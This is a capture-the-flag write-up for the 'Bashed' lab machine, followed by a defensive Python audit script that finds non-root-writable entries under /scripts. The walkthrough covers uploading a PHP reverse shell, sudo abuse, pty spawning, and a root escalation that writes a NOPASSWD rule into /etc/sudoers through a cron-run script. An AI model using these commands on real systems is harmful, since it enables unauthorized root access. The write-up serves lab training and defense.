| Name | Bashed |
|---|---|
| IP | 10.10.10.68 |
| OS | Linux |
| Points | Easy(20) |

Recon
Web

http://10.10.10.68/dev/phpbash.php
We need to upload a php-reverse-shell.php
Let's upload it to the /uploads dir and browse to it while you're listening with nc :D
BOOM, we got a shell as www-data xD
sudo -l
We could run /bin/bash as user scriptmanager without any password on the box
sudo -u scriptmanager /bin/bash
python -c 'import pty;pty.spawn("/bin/bash")'
cat /home/arrexel/user.txt
We got our shell as scriptmanager and we have the user.txt btw
Linpeas
/scripts/test.txt
That's a weird dir lul
Gettin root
cd /scripts
vi /scripts/test.py
now the full key combo on this shit terminal like a REAL blind vim elitist:
Go
os.system('echo "scriptmanager ALL=NOPASSWD: /bin/bash" >> /etc/sudoers')
<ctrl+v><esc>:wq
I meant <shift>+g (go to the last line of the file) -> o (open a new line) -> <ctrl>+v (paste the cmd you want) -> <escape> (back into normal mode) -> :wq (command mode save and quit)
Wait 1 min and run sudo /bin/bash
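
From the defender's side, the root step works because a non-root user can edit files that a root job executes. The audit below is an added example, not part of the original writeup. It assumes, as the one-minute wait suggests, that a scheduled root job runs the .py files in /scripts; the function names are made up for illustration.

```python
import os
import stat
import sys


def write_risks(uid, mode):
    """Return the reasons a non-root user could modify an entry with this owner and mode."""
    reasons = []
    if uid != 0:
        reasons.append("owned by uid %d, not root" % uid)
    if mode & stat.S_IWGRP:
        # Still worth reviewing when the group is root's: check its membership.
        reasons.append("group-writable")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit(root_dir):
    """Walk root_dir (including itself) and map each risky path to its reasons."""
    paths = [root_dir]
    for base, dirs, files in os.walk(root_dir):
        paths += [os.path.join(base, name) for name in dirs + files]
    findings = {}
    for path in paths:
        st = os.lstat(path)  # lstat: never follow a symlink out of the tree
        if stat.S_ISLNK(st.st_mode):
            continue  # permission bits on a link are meaningless
        reasons = write_risks(st.st_uid, st.st_mode)
        if reasons:
            findings[path] = reasons
    return findings


if __name__ == "__main__":
    # Default target is the directory from this writeup; pass another as argv[1].
    target = sys.argv[1] if len(sys.argv) > 1 else "/scripts"
    for path, reasons in sorted(audit(target).items()):
        print("%s: %s" % (path, ", ".join(reasons)))
```

Any finding on a directory matters as much as one on a file: write access to the directory is enough to replace a root-owned script inside it.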